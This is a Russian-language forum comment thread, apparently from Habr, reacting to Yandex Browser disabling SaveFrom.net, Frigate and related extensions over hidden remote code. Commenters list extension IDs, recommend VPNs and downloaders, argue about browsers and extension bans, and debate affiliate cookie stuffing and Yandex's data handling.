                                                        Амазон и телеграм — нет же в бане? Телегу так вообще официально помиловали, а амазон в бане вообще не был (дольше небольшого времени), и там бан по сети был, а не признаку что это амазон
                                                        0
                                                        Простенький VDS например vultr (Германия) или timeweb (Россия) +
                                                        github.com/jawj/IKEv2-setup
                                                        github.com/kylemanna/docker-openvpn
                                                          0

                                                          FoxyProxy

                                                            –1
                                                            Как мне кажется иметь на ПК несколько установленных браузеров и пользоваться тем или иным в определённых ситуациях — реалии современной жизни. Поэтому ставьте браузер Opera и пользуйтесь встроенным VPN, что я давно и делаю. В моей работе это нужно только для двух сайтов.
                                                            +4
                                                            Спасибо тебе мил человек. Не понятно что мешало это сделать ребятам из Яндекса
                                                              0
                                                              gfjocjagfinihkkaahliainflifnlnfc — скачать-музыку-c-vk
                                                              Остальные — download.master, savefrom.net и frigate (помимо Автоматическое применение купонов
                                                              ).
                                                                0
                                                                И чем же дополнение DownloadMaster-а заменить??
                                                                  0
                                                                  Зачем оно нужно? программу используй
                                                                    0
                                                                    Чтобы:
                                                                    а. отправлять ссылки все или одну со страницы в DM.
                                                                    б. чтобы находить и перехватывать медиа-файл со страницы.
                                                                    0
                                                                    Internet Download Manager — standalone программа + расширения для разных браузеров. Пользуюсь много лет. Позволяет сохранять видео со многих сервисов, поддерживает докачку, пакетное скачивание. Обновляется регулярно. Платная, но встречается и …
                                                                  0
                                                                  Продолжим расшифровку
                                                                  acdfdofofabmipgcolilkfhnpoclgpdd — VDP: Best Video Downloader
                                                                  oobppndjaabcidladjeehddkgkccfcpn — Y2Mate — Video Downloader
                                                                  aonedlchkbicmhepimiahfalheedjgbh — Помощник
                                                                  aoeacblfmdamdejeiaepojbhohhkmkjh — RadioGaGa
                                                                  eoeoincjhpflnpdaiemgbboknhkblome — Автоматическое применение купонов(https://savematik.com)
                                                                  onbkopaoemachfglhlpomhbpofepfpom — Автоматическое применение купонов (Автор: shopscoupons.fr)
                                                                  inlgdellfblpplcogjfedlhjnpgafnia — Автоматическое применение купонов (Автор: shopscoupons.br)
                                                                  ejfajpmpabphhkcacijnhggimhelopfg — Автоматическое применение купонов (Автор: caa.newstore)
                                                                  pgjndpcilbcanlnhhjmhjalilcmoicjc — Автоматическое применение купонов (Автор: frcouponsapp)
                                                                  napifgkjbjeodgmfjmgncljmnmdefpbf — Автоматическое применение купонов (Автор: frcouponsapp)
                                                                  glgemekgfjppocilabhlcbngobillcgf — Автоматическое применение купонов (Автор: couponsatcheck)
                                                                  klmjcelobglnhnbfpmlbgnoeippfhhil — Автоматическое применение купонов (Автор: shopscoupons.store)
                                                                  ldbfffpdfgghehkkckifnjhoncdgjkib — Автоматическое применение купонов (Автор: sh.coupons.fr)
                                                                  mbacbcfdfaapbcnlnbmciiaakomhkbkb — friGate CDN
                                                                  mdnmhbnbebabimcjggckeoibchhckemm — friGate Light
                                                                  lfedlgnabjompjngkpddclhgcmeklana — SaveFrom.net помощник
                                                                  mdpljndcmbeikfnlflcggaipgnhiedbl — УДАЛЕНО
                                                                  npdpplbicnmpoigidfdjadamgfkilaak — УДАЛЕНО
                                                                  ibehiiilehaakkhkigckfjfknboalpbe — УДАЛЕНО
                                                                  lalpacfpfnobgdkbbpggecolckiffhoi — УДАЛЕНО
                                                                  hdbipekpdpggjaipompnomhccfemaljm — friGate3 proxy helper
                                                                  gfjocjagfinihkkaahliainflifnlnfc — УДАЛЕНО
                                                                  ickfamnaffmfjgecbbnhecdnmjknblic — УДАЛЕНО
                                                                  bmcnncbmipphlkdmgfbipbanmmfdamkd — УДАЛЕНО
                                                                  miejmllodobdobgjbeonandkjhnhpjbn — УДАЛЕНО
                                                                  +9
                                                                  Прямо сейчас на главной странице SaveFrom.net висят тезеры «богатого богатства»
                                                                  Возможно проект взломан или продан.
                                                                  image
                                                                    +2
                                                                    Подскажите — я верно понимаю, у вас на главной отображается страница в странице после захода?

                                                                    P.S. разобрался, это вы наложили страницу перехода и страницу savefrom
                                                                      0
                                                                      Нет, на главной отображается тизер (правый угол, сверху) при клике на который отображается страница «невероятное везение официанту ....»
                                                                        +8
                                                                        обычная реклама, коих полно на такого рода сайтах, чему тут удивляться?
                                                                      0
                                                                      Зашел только что, ничего такого нету.
                                                                      З.Ы. у меня установлен адблок
                                                                        +5
                                                                        Вот ведь неожиданно, стоит адблок и нет рекламы.))
                                                                    • UFO just landed and posted this here
                                                                        +2
                                                                        Какие и почему?
                                                                        • UFO just landed and posted this here
                                                                            +12
                                                                            Смотрите, они же не встроены, это просто список, витрина. Они скачиваются и устанавливаются только после включения пользователем.
                                                                              +8
                                                                              Добрый день, Ув. Яндекс.
                                                                              Сделайте пожалуйста, кнопку ОТКЛЮЧИТЬ ВСЕ информеры\всю нечисть из дзена\и все персональные подборки.
                                                                              Почему они по умолчанию включены и так ясно, но не делать умышленно кнопки «отключить все» — это уже издевка (
                                                                                –8
                                                                                У всех блоков есть возможность отключения. Если у какого-то нет, подскажите, у какого, пожалуйста?
                                                                                  +14
                                                                                  Общая кнопка, которая отключает все блоки разом.
                                                                                  Далее выборочно юзер включает что ему нужно.
                                                                                  А не выборочно выключает.
                                                                                    +9
                                                                                    Подумаем, спасибо.
                                                                                      0
                                                                                      Подобные жалобы видел и пару лет назад, и с тех пор ничего не поменялось. И при появлении новой нечисти она сразу включается.
                                                                                        0
                                                                                        Думаешь они из-за пары жалоб откажутся от конверсии пользователей на их сервисы? Рублем карать надо — не пользоваться.
                                                                                          0
                                                                                          Думаю, что лох не мамонт.
                                                                                    +3
                                                                                    kukutz, выделил все, что не имеют. Всегда пожалуйста. Периодически появляется прочая нечисть, так что я давно забил на использование Яндекса.
                                                                                    Заголовок спойлера
                                                                                    Скриншот главной яндекса с 4 выделенными неотключаемыми блоками
                                                                                      +8
                                                                                      Погодите, вы не про браузер, а про сайт Яндекса?

                                                                                      Так вот же, всё выключил: ya.ru
                                                                                        –9
                                                                                        Отлично! Если я захочу полюбоваться на поисковую строку, я обязательно этим воспользуюсь.
                                                                                        А так мимо.
                                                                                        Очень мерзкий вылетающий блок с отвратительной прыгающей анимацией, чтобы горели в аду все, кто к нему причастен
                                                                                        Конечно, можно сказать, что там есть кнопка отказаться. Но потом появится другой, третий, четвёртый баннер, и нет им конца. Так что спасибо, но нет.
                                                                                        Очень мерзкий вылетающий блок с отвратительной прыгающей анимацией на странице результатов поиска Яндекса, чтобы горели в аду все, кто к нему причастен
                                                                                          +4
                                                                                          Адблок подобную нечесть убирает
                                                                                            +2
                                                                                            Самое интересное, что эти баннеры показывает везде, во всех браузерах, даже когда сам Я.Браузер давно уже стоит на компе!
                                                                                            +1

                                                                                            Там это, всплывает потом "установите наш браузер" :)

                                                                                          +1
                                                                                          Недавно спрашивал в ТП о возможности отключения показа видео на Дзене. Сказали, что возможности отключения видео нет.
                                                                                            +3
                                                                                            Я тоже спрашивал. Меня убеждали, что «нельзя никак, кококо». Но можно. Вроде, как-то так

                                                                                            yandex.ru##.card-video-block
                                                                                          +3
                                                                                          По-моему проще вообще не пользоваться яндекс-браузером. Тот же brave гораздо лучше по всем параметрам
                                                                                            +8
                                                                                            А может просто FF использовать вместо непонятных надстроек над хромом.
                                                                                              –5
                                                                                              непонятных надстроек над хромом

                                                                                              Вот сейчас смешно было. CEO «непонятных надстроек над хромом» — Brendan Eich, погуглите, кто такой; а CTO — Brian Bondy.


                                                                                              ФФ уже лет шесть можно использовать только из жалости к стюардессе, когда нужен браузер «ни одного логина» (инкогнито не совсем так работает, если что).

                                                                                                +1
                                                                                                ФФ уже лет шесть можно использовать только из жалости к стюардессе

                                                                                                Эта стюардесса намного бодрее текущего хрома. И на порядок свободнее.
                                                                                                инкогнито не совсем так работает, если что

                                                                                                А как оно работает?
                                                                                                  –4
                                                                                                  бодрее текущего хрома

                                                                                                  Не знаю, мне не приходилось запускать его на кофеварке; на компьютере я разницу не замечаю.


                                                                                                  на порядок свободнее

                                                                                                  Чем ядро движка chromium? Разве что, в голове у стюардессы.


                                                                                                  как оно работает?

                                                                                                  Ну только ленивый еще не видел ни одну из миллиарда публикаций «что на самом деле утекает в инкогнито моде».

                                                                                                    +1
                                                                                                    на компьютере я разницу не замечаю

                                                                                                    Ну и замечательно.
                                                                                                    Чем ядро движка chromium?

                                                                                                    Хром не равно хромиум. И даже в хромиуме такой вагон следов гугла, что делают специальные сборки.
                                                                                                  0

                                                                                                  Я почитал пор Брендана и не совсем понимаю что именно в его карьере наводит на мысль о том, что он может быть и будет хорошим CEO. Он даже CTO был не оч долго, а CEO — это совсем другая ответственность в другой сфере.

                                                                                                    0

                                                                                                    Вообще ничего не наводит на мысли о том, что он может быть неплохим CEO. Да у меня и нет таких мыслей.


                                                                                                    Но ведь и я не акции покупаю, а браузер выбираю. И мне понятнее надстройки, которые будут сделаны Эйком, а не непойми кем в ФФ.

                                                                                                      0

                                                                                                      Ну Эйк работал в Мозилле пока всё было хорошо, так что не то что бы он прям непонятно кто в мозилле :) Сейчас его там уже нет, но не так долго, надо сказать.

                                                                                                        0

                                                                                                        Ключевое слово «будут».

                                                                                        0
                                                                                        у меня стоит мажордомо. и там есть голосовой помощник с имеем алиса. встроенный в яндекс браузер помощник тезка. они борются за право «первой ночи» яндекс удаляю. тк умный дом важнее.
                                                                                          +1
                                                                                          Можно открыть «Установка и удаление программ» в Windows и удалить Алису отдельно от браузера (как я и сделал сразу после установки).

                                                                                          Другой вопрос, зачем ее поставлять в комплекте с браузером. Или, например, зачем в почте календарь и телемост на самом удобном месте, а чтобы открыть отправленные письма надо тянуться незнай куда третьей рукой. Но это всё вопросы риторические.
                                                                                            0

                                                                                            Извините, недопонял про "Отправленные" — что с ними не так?


                                                                                            Типичная Я.Почта

                                                                                            image

                                                                                              0
                                                                                              My bad. Имел в виду мобильное приложение. Там список папок открывается свайпом слева или гамбургером в левом верхнем углу. Из-за размеров современных телефонов не удобно ни то, ни другое, свайп нужно делать аккуратно, иначе свайпается письмо. Зато телемост — в нижней панели.
                                                                                            0
                                                                                            Я конечно точно не знаю, но мне помнится что Алиса это изначальная фича яндекса, к которой примазался majordomo. А вообще обычно можно сменить имя помощника, у домы этого нет?
                                                                                            зы у меня HomeAssistant (пока) — такой проблемы нет.
                                                                                              0
                                                                                              нет вы неправы. в мажордомо алиса появилась раньше. и можордомо не примазывался к яндексу. проблема в том что мне алиса от яндекса ненужна а имя у алисы из яндекса я сменить не могу. а имя у алисы из можордомо сменить не хочу тк привык.
                                                                                              решение проблемы подсказал zv347 постом выше. попозже попробую.
                                                                                                0

                                                                                                Имя Алисы от Яндекса можно поменять на Яндекс ЕМНИП

                                                                                                  0
                                                                                                  спасибо. много браузеров не бывает. поставим и яндекс. хотя пока у меня отношение к нему как амиго браузеру. надеюсь я неправ.
                                                                                            0
                                                                                            А я перестал пользоваться Браузером этим, когда нормальные закладки заменили какой-то фигней (коллекции называются… притом это не отключаемо). И оставил его как раз для таких расширений типа saveFrom (т.е. запускал его только когда надо было что-то скачать, а теперь и это удалили)))))
                                                                                              0

                                                                                              Не заменили, в браузере есть и локальные закладки, и облачные коллекции.

                                                                                                0
                                                                                                Значит уже вернули… Потому что изначально по command+D стало невозможно сохранить ссылку локально в закладки. Но теперь уже вряд ли вернусь.

                                                                                                p/s И вот сейчас попробовал… Command+D открывает окно, в котором можно сохранить в коллекцию или в уже существующую папку закладки. А новую папку создать нельзя. Хотя когда было сохранение только в закладки, можно было сразу создать каталог и в него добавить закладку.
                                                                                                  0
                                                                                                  Этот недочет про создание папок закладок планируем исправить, да.
                                                                                          +24
                                                                                          поэтому приняли решение отключить в Яндекс.Браузере уже установленные копии расширений SaveFrom.net, Frigate Light, Frigate CDN и некоторых других. Пользователи этих расширений получат уведомление, в котором мы расскажем о причинах отключения. После этого они смогут принять осознанное решение и при необходимости включить их вновь (хотя мы настоятельно рекомендуем так не поступать

                                                                                          ИМХО, тут надо выпиливать с корнем. Всё же, расширения содержат возможность запускать вообще любой код. Кто знает, что сделают владельцы, узнав что «Гипс снимают. Клиент уезжает».
                                                                                            –4
                                                                                            Если сделают что-то ещё плохое, то сразу же жестко заблокируем, конечно.
                                                                                            • UFO just landed and posted this here
                                                                                                +35
                                                                                                когда убьют, тогда и приходите.
                                                                                                  +1
                                                                                                  Плохого или незаконного? Незаконное — да. Надо банить. А «плохое» для каждого своё.
                                                                                                    –3

                                                                                                    Использование ресурсов компьютера пользователя без его ведома в Беларуси можно рассматривать с точки зрения уголовного права. Обфусцирование кода, подгрузка непроверенных скриптов говорят о том, что разработчики приняли специальные меры, чтобы не связанная с основной функцией деятельность их расширения осталась незамеченной.

                                                                                                      +5
                                                                                                      В целом, мне тоже такое поведение не нравится, но баны по произволу почти монополистов (я про отрасль в целом: ютуб, андроид, магазин плагинов ...) на мой взгляд гораздо хуже.

                                                                                                      Информировать пользователей о «скользком» поведении — плюсую двумя руками, а вот банить — только за действия, для которых вынесено судебное решение, или видно что они явно незаконны. И тут ещё встает вопрос, а по законам какой страны (браузера, авторов плагина или пользователя)?
                                                                                                        +1
                                                                                                        Но пользователь же согласится с EULA
                                                                                                        (а если так незаконно — то например и протекторы (тот же Denuvo/VMProtect) незаконны — обфускация ж, и (тем более) Warden из WoW (и аналогичная штука в EVE Online) — там прилетает код с сервера периодически и смотрит вообщем что ему надо, и отсылает результаты, если заблокировать — в EVE сразу будет вылет)
                                                                                                        Да и наверно Win10, с ее добровольно-принудительно установкой обновлений, часто без внятных описаний что они делают.
                                                                                                          –1
                                                                                                          EVE Online) — там прилетает код с сервера

                                                                                                          То то я в неё не играл. Чуйка что ли на подобное вот это вот?
                                                                                                            0
                                                                                                            Это как минимум у WoW есть (люди судились даже).
                                                                                                            EVE'овский код вообщем то достаточно безобиден (ну — те образцы что мне в лапки попали несколько лет назад). Там:
                                                                                                            — попытка идентифицировать компьютер (хеши MAC'ов сетевых, хеши данных видеоадаптера,etc).
                                                                                                            — попытка проверить что в особо интересных местах кода на Stackless Python — находится изначально загруженный игровым клиентом с диска код (подменить загружаемы код — скажем так затруднительно, там шифрование и подписи).
                                                                                                            И все. Список запущенных приложений насколько помню — не сканируется (хотя это возможно).

                                                                                                              0
                                                                                                              Это как минимум у WoW есть

                                                                                                              Я же говорю чуйка.
                                                                                                    +19
                                                                                                    ИМХО тут поможет только политика zero tolerance: одного раза достаточно для расстрела без права на УДО и апелляцию. Только это может напугать тех, кто обдумывает пойти по стопам жулья. А то будет как с Пейсбуком:
                                                                                                    1. Ой, это мы случайно, больше не будем.
                                                                                                    2. Goto 1.
                                                                                                      0
                                                                                                      тут поможет только запрет исполнения случайного кода, все должно быть подписано, на уровне браузера контролировать, так как теперь расширения ставятся из центра — пусть подпись центра и используется.
                                                                                                        0
                                                                                                        Как быть разработчикам?
                                                                                                        Как быть если расширение полноценное не надо но достаточно user script'ов?(с одной стороны — SaveFrom у меня через Tampermonkey и работал на Chrome(в отдельном профиле под эти задачи), с другой стороны — есть куча полезного)
                                                                                                        Как быть если расширение нарушает политику конкретного центра но само по себе — белопушистое (ну кроме — прогибатся под стор)?
                                                                                                        Кстати а какую именно подпись должны проверять Яндекс браузер и новый Edge? Гугла (они ж могут с гуглостора ставить расширения) + свою?
                                                                                                        Хотя как опция — это было бы интересно, как и детектор обфускации
                                                                                                        +2
                                                                                                        То же самое хотел написать.
                                                                                                        С одной стороны, командой Яндекса проделана огромная и полезная работа. С другой — производители расширений-зловредов, по сути, вообще никак от этого не пострадали. То есть риска у такой противоправной деятельности по сути нет: не попался — хорошо, продолжаешь зарабатывать свои преступные деньги, попался — ну перестал, но ничего не теряешь. Можно начинать с начала. И вот именно здесь кроется корень проблемы. Должна быть хоть какая-то ответственность, хотя бы экономическая. Либо белые списки и код расширения, подписанный магазином. И запрет на подгрузку чего бы то ни было другого. Причём все остальные расширения удалять не нужно, можно их оставить. Но пользователь должен в явном виде иметь информацию, что вот это расширение точно безопасное, а вот это — уже на свой страх и риск.
                                                                                                          0
                                                                                                          Safari скучает по Вам: о)
                                                                                                          0
                                                                                                          И любой инспектор получает права диктатора. Как вам ситуация, что вам напишет инспектор с Яндекса, в частном порядке, шантажируя вырубить ваше расширение, если не сделаете взнос на биткоин-кошелек
                                                                                                            0
                                                                                                            С тем же успехом непорядочный инспектор может придумать и другой повод для шантажа, все так же рискуя вместо битков получить пинок под зад от работодателя и приговор суда за вымогательство. Давайте все же отделим мух от котлет, тем более что куда опаснее т.с. институциализация подобной практики, когда неугодные расширения вылетают из сторов потому, что начинают противоречить коммерческим интересам владельца стора.
                                                                                                            0
                                                                                                            выглядит как реактивное компульсивное поведение
                                                                                                            прекратите истерику — говорят в таких случаях
                                                                                                            расстрел без апелляции, боже мой, как это должно работать, как запугивание и атмосфера страха
                                                                                                            с вами родители и на работе тоже так поступают?
                                                                                                              –2

                                                                                                              Ты так договоришься до того, что Яндекс.Трусы забанит в магазине расширений Советник Яндекс.Маркета

                                                                                                          +12
                                                                                                          Крутая работа, спасибо!
                                                                                                            +8
                                                                                                            Сегодня Касперский стал ругаться, что в Хроме заблокирован переход по ссылке gatpsstat.com/ext/stat. Полез в Гугл и тут эта статья! Отключил Savefrom.net и тишина!
                                                                                                              +1
                                                                                                              Та же самая история. Больше часа продолжались попытки что-то там загрузить. И тут это сообщение…
                                                                                                              Спасибо всем ребятам, хорошо сработали.
                                                                                                                0
                                                                                                                та же история с фригейтом
                                                                                                                  +9

                                                                                                                  Представляю, как мэлварщики ржали, когда к ним Яндекс обратился первый раз насчёт левого звука. "Да-да, спасибо Яндекс, не волнуйтесь, мы сейчас починим наше расширение".

                                                                                                                    0
                                                                                                                    да у меня такая же беда где-то в обед началась, переменял всё пароли, обновил хром, про сканировал ноут. только здесь понял проблему. Спасибо большое!
                                                                                                                    0
                                                                                                                    С расширениями у меня с месяц назад была еще другая проблема — если были установлены Selenium IDE и/или Katalon IDE — то висли вкладки со статьями из Дзена(и изредка с некоторыми другими сайтами от Яндекса такое происходила)
                                                                                                                      +4
                                                                                                                      Свинство, конечно… И ведь непонятно, сколько еще таких расширений различным способом пользуют наши компьютеры. Но у меня отключился savefrom.net в ЯБ с уведомлением что-то вроде «использует много ресурсов».
                                                                                                                          –20

                                                                                                                          А что свинство? Вы ничего за эти расширения не платите. Очевидно, что монетизация происходит как-то иначе.

                                                                                                                            +16
                                                                                                                            Если без уведомления и согласия пользователя — то свинство.
                                                                                                                              –3
                                                                                                                              Вы никогда не интересовались на чем зарабатывают Я\G\F и прочии фаанги? :) Если верить разным разоблачительным статьям тут же на хабре, то далеко не вся их деятельность описана в пользовательском соглашении
                                                                                                                                +3
                                                                                                                                По поводу остальных фаангов не скажу, а про то, чем зарабатывает Яндекс, я довольно хорошо изнутри представляю. Ни с чем, что я мог бы отнести к категории «свинство», я не сталкивался.
                                                                                                                                Но разоблачительным статьям с хабра, конечно, виднее ))
                                                                                                                                  –2
                                                                                                                                  Не думаю, что вы в курсе абсолютно всей деятельности вашей компании. Я ничего не пытаюсь придумать и ни на что не намекаю, но уверенность что вы прям все хорошо представляете — ошибочна. Больше сомнений, что ли :)
                                                                                                                                    +2
                                                                                                                                    Я не говорю, что в курсе абсолютно всей деятельности.
                                                                                                                                    Но, во-первых, с достаточно многими аспектами я всё-таки сталкивался. Во-вторых, по моему опыту, большинство сотрудников Яндекса — порядочные люди. В среднем ощутимо более порядочные и идейные, чем в целом по популяции.
                                                                                                                                    Так что
                                                                                                                                    Больше сомнений, что ли :)
                                                                                                                                    у меня вызывают как раз «разоблачительные статьи» если в них нет никакой конкретики, только общие домыслы.
                                                                                                                                      –4
                                                                                                                                      Ну раз все с кем вы имели дело — порядочные люди, то конечно.
                                                                                                                                        +5
                                                                                                                                        >Я\G\F и прочие

                                                                                                                                        … не заставляют мой компьютер майнить биткойны. А по поводу остального — погуглите, где приобрести шапочку из фольги на свой вкус.

                                                                                                                                        И уж тогда, чтобы без двойных стандартов и намеков на конспирологическое «бесплатный сыр в мышеловке», «если вам не продали, то продали вас» и т.п. многозначительное бла-бла-бла — меняйте платформу для разработки. А то что же, разрабатываете для Android, принадлежащего Google, поддерживаете непорядочную корпорацию? :-) Будьте последовательны, только free soft, только хардкор!
                                                                                                                                          0
                                                                                                                                          Если вам очень хочется перейти на личности и поучить меня жить — почитайте что такое AOSP и какую роль в «free soft» он играет
                                                                                                                                            +1
                                                                                                                                            не заставляют мой компьютер майнить биткойны

                                                                                                                                            Учитывая производительность некоторых приложений G/F, уж лучше бы они биткоины майнили… Любое гуглоприложение на голом смартфоне с Android One или на Google Pixel можно привести в пример.

                                                                                                                                              0
                                                                                                                                              где приобрести шапочку из фольги на свой вкус.

                                                                                                                                              То есть считать, что все крупные компании продают ваши данные на право и на лево, это теперь синоним шапочки?
                                                                                                                                                0
                                                                                                                                                Кстати, а если серьёзно. Майнинг биткоинов — это же довольно интересное и оригинальное решение, как монетизировать сайт и при этом не показывать пользователю рекламу.
                                                                                                                                                  –2
                                                                                                                                                  Очень маленький доход, само собой майнить придется не биткоины а альткоины, и даже в этом случае один клиент посидев даже час на машине не принесет профита который был бы сравним с рекламными бюджетами.
                                                                                                                                                    0
                                                                                                                                                    Вы опоздали лет на 5, большая часть майнеров уже давно в черных списках антивирей и адблоков. Ибо взлетающий ноут бесил людей больше, чем реклама.
                                                                                                                                                    0
                                                                                                                                                    Не заставляют майнить биткойны, зато заставляют смотреть рекламу. Отказаться от неё тоже нельзя, уведомлений о ней никаких нет (просто рекламу сразу видно, а майнинг биткойнов происходит в фоне и не виден явным образом). Майнинг биткойнов тратит ресурсы компьютера, просмотр и фильтрация рекламы тратит ресурсы вашего мозга. Что хуже — под большим вопросом.
                                                                                                                                            +1
                                                                                                                                            У Google, например, очень подробное соглашение об использовании, и при каждом его изменении он настоятельно рекомендует его перечитать. А что «не вся описана» — ну это из разряда «власти скрывают».
                                                                                                                                          0
                                                                                                                                          Есть относительно безобидные виды монетизации, типа перехвата партнерских кук на Алиэкспресс и в других магазинах. Для большинства это незаметно (если кешбек сервисами не пользоваться) и не очень вредоносно. А вот то что в статье — это свинство. Учитывая выполнение произвольного когда они могли вообще поднять на вашем компьютере прокси, а потом бы вас посадили как Богатова. Это уже не безобидная монетизация.
                                                                                                                                            –5
                                                                                                                                            Не надо путать теплое с мягким. Если вас надо будет посадить, как Богатова, вас посадят. Это никак не связано с выполнением произвольного кода где бы то ни было. А вот сколько Богатовых прописалось по хатам благодаря бесконтрольному и незаконному сливу Яндексом персональной информации пользователей — большой вопрос.
                                                                                                                                              +6
                                                                                                                                              Яндекс не занимается незаконным сливом информации. Яндекс отвечает только на запросы правоохранительных органов различных стран, на которые должен ответить согласно законодательству, и только если они оформлены надлежащим образом.
                                                                                                                                                –6
                                                                                                                                                Ну вот, опять автоответчик… ))
                                                                                                                                                Ну да, ну да. Google продает инфу на лево и на право, Facebook продает инфу на лево и на право, ФСБ само продает инфу на лево и на право, но Яндекс белый и пушистый, конечно.
                                                                                                                                                Лично вы работали с силовиками? Или, быть может, лично вы отказывали силовикам в предоставлении какой-либо информации без официального запроса?
                                                                                                                                                Я убежден, что после пары таких отказов, Яндекса уже бы не существовало.
                                                                                                                                                  +1
                                                                                                                                                  Да, постоянно отказываем в выполнении ненадлежаще оформленных запросов.
                                                                                                                                                    0
                                                                                                                                                    Для любителей почитать www.proekt.media/narrative/yandex-i-kreml
                                                                                                                                                    И посмотреть youtu.be/fHv9BEGkmQU
                                                                                                                                                      0
                                                                                                                                                      А… ну спасибо, что сказали. Теперь я вам поверил…
                                                                                                                                                        +2
                                                                                                                                                        После ситуации описанной в статье Новой газеты «Прогнётся всё» — не верим вам ни бита.
                                                                                                                                                    +2
                                                                                                                                                    За ним специально не охотились, просто кто-то с его айпи что-то разместил. Сам он не был оппозиционером или кем-то таким, просто случайная жертва системы
                                                                                                                                                    +2
                                                                                                                                                    Безобидные? Вы уверены в понимании ситуации? За эти «безобидные» дают реальные тюремные сроки. Это воровство рекламного бюджета у Алиэкспресс и других магазинов. Это также воровство партнерских отличеслений у всевозможных вебмастеров, ютуб блогеров, контентных сайтов, владельцев соц. групп и т.д. и т.п.
                                                                                                                                                      0
                                                                                                                                                      У вас есть пример когда за подобную монетизацию давали тюремные сроки? Для пользователя это вполне безобидно, если он не использует кэшбек. Для Алиэкспресса в общем-то тоже, потому что они все равно платят за трафик и трафик с расширений не запрещают, хотя такая возможность есть, значит их устраивает. Кто получит вознаграждение — блогер или автор расширения Али в общем-то плевать. Можно с таким же успехом сказать, что кэшбек сервисы воруют отчисления у блогеров.
                                                                                                                                                        +2
                                                                                                                                                        Вы прикидываетесь или занимаетесь сами перехватом партнерских кук и такими речами пытаетесь приуменьшить значимость проблемы? Надеюсь вы просто не разобрались в теме. Объясняю.
                                                                                                                                                        1. То, что вы называете перехватом кук, называется куки стаффингом. В комментариях тут это уже упоминали в отрицательном ключе.
                                                                                                                                                        2. Для условного работника хладокомбината, который решил заказать микросхему для своего хобби — перехват кук действительно полностью не имеет значения, потому покупатель ничего не теряет. Но никто и не говорит, что криминал именно в этом.
                                                                                                                                                        3. Для Алиэкспресса в общем-то тоже, потому что они все равно платят за трафик
                                                                                                                                                          Вот тут Вы не правы. Алиэкспресс, как и любой другой рекламодатель, платит только и именно тогда, когда покупатель попал на сайт Алиэкспресс (и совершил покупку) после сознательного перехода по партнерской ссылке аффилиата (партнера). Если сознательного перехода на сайт Алиэкспресс не было, если покупатель зашел сам на сайта Алиэкспресс, то и платить Алиэкспресс никому ничего не должен. Но если в браузере стоит расширение, которое скрытно установило свои партнерские куки, то это уже мошенничество. Расширение не привлекало покупателя на сайт и соответственно Алиэкспресс не должен такое оплачивать. Поэтому они не «все равно платят за трафик».
                                                                                                                                                        4. трафик с расширений не запрещают
                                                                                                                                                          Запрещают. И не они одни. Не будьте голословными. Это наверняка прописано в условиях сотрудничества с Алиэкспресс. В этом году, если ничего не путаю, один крупный кэшбэк сервис, которым я пользуюсь и вы наверняка его тоже знаете, изменил свой интерфейс расширения именно по причине запрета трафика из расширений со стороны Алиэкспресс. Такое было объяснение и я им верю, что они не сами это придумали.
                                                                                                                                                        5. хотя такая возможность есть, значит их устраивает
                                                                                                                                                          Такая возможность есть. И они ее запретили использовать видимо не просто так.
                                                                                                                                                        6. Кто получит вознаграждение — блогер или автор расширения Али в общем-то плевать.
                                                                                                                                                          Нет, не плевать. Это репутация партнерской программы, раз. Два — если ничего не делать, то в партнерке останутся одни мошенники с неразрешенными видами трафика и с этим магазином постепенно перестанут работать нормальные фирмы. И три, это самое главное тут (вы опять не в ту сторону рассуждаете). Самое важно тут, если расширение перехватывает чьи-то партнерские куки, то это означает, что оно забрало партнерские отчисления у того, кому они положены по правилам рекламодателя. Это может быть блогер на Youtube, купонный или скидочный сайт, сайт-обзорник или что угодно другое. Это их заслуга, что они привели покупателя на Алиэкспресс и они должны за это получить вознаграждение. Но если их куки перехвачены расширением, то это финансовое мошенничество со всеми вытекающими.
                                                                                                                                                        7. Можно с таким же успехом сказать, что кэшбек сервисы воруют отчисления у блогеров.
                                                                                                                                                          Нет, тут не так. У вас видимо есть какие-то проблемы с пониманием причин и взаимосвязей. Если блогер делает обзор на Youtube, к примеру, и размещает под роликом ссылку, по которой переходит покупатель на сайт Али, то партнерские отчисления должен получить блогер. Но есть и другие сервисы для покупателя. Например, кэшбэк-сервисы, которые вы упомянули. Они тоже имеют полное право на существование, потому что не запрещены по своей сути Алиэкспресс и другими рекламодателями. Если покупатель с Youtube имеет установленный плагин для своего браузера от кэшбэк сервиса, то он вправе им воспользоваться в установленном порядке. Сейчас — это означает осознанный переход (клик) на сайт Алиэкспресс с сайта (но не из расширения!) кэшбэк сервиса. Если он его сделал до перехода по партнерской ссылке Youtube ролика, то партнерские отличесления уйдут Youtube блоггеру. Если после — авторам кэшбэк сервиса. В любом случае, покупатель делает сознательные! клики по одной или второй партнерской ссылке.
                                                                                                                                                        8. А монетизация, про которую написали Вы, как про безобидную — это откровенное воровство денег или у Алиэкспресс или у других партнеров типа блогера на Youtube или даже у кэшбэк сервиса. Я сам на этом попался когда-то. За это дают реальные сроки. Вы просили пример? Задайте запрос в поисковике «куки стаффинг тюрьма» или подобный. Ссылки прямые давать не буду, там много статей в том числе и история на Античате.

                                                                                                                                                        На Хабре есть директор Алиэкспресс.ру и представители других крупных магазинов. Спросите их мнение, если мне не верите. Если они ответят что-то иное, я очень удивлюсь. Почему? Потому что я сам имею отношение к не маленькому магазину с партнерской программой и поэтому я знаю о чем говорю.
                                                                                                                                                          –1
                                                                                                                                                          Вы прикидываетесь или занимаетесь сами перехватом партнерских кук и такими речами пытаетесь приуменьшить значимость проблемы?

                                                                                                                                                          Я никогда не занимался монетизацией расширений или их написанием для публичного доступа. Но я сталкивался с подобной монетизацией как пользователь, после чего взял привычку делать все покупки с кешбеком с чистого профиля.

                                                                                                                                                          Если сознательного перехода на сайт Алиэкспресс не было, если покупатель зашел сам на сайта Алиэкспресс, то и платить Алиэкспресс никому ничего не должен

                                                                                                                                                          За исключением когда человек использует кешбек сервис. Это точно такая же ситуация: клиента никто не приводил, он пришел сам, но партнерское вознаграждение все равно было выплачено (а сервис поделился частью с покупателем). Кешбек Алиэкспресс не запрещает. Тут по сути тоже самое, только с покупателем никто не поделился. Так или иначе, это уже заложено в цене (если продавец не участвует в партнерской программе, то и вознаграждения не будет, т.е. решение принимает продавец и это обязательно будет отражено в цене).

                                                                                                                                                          Запрещают. И не они одни.

                                                                                                                                                          Совсем ведь не сложно зайти на Admitad и посмотреть условия программы:
                                                                                                                                                          Обратите внимание на пункт 4
                                                                                                                                                          С 03.09.2020 в партнерской программе AliExpress RU&CIS разрешены следующие виды трафика для России и стран СНГ (кроме Украины):

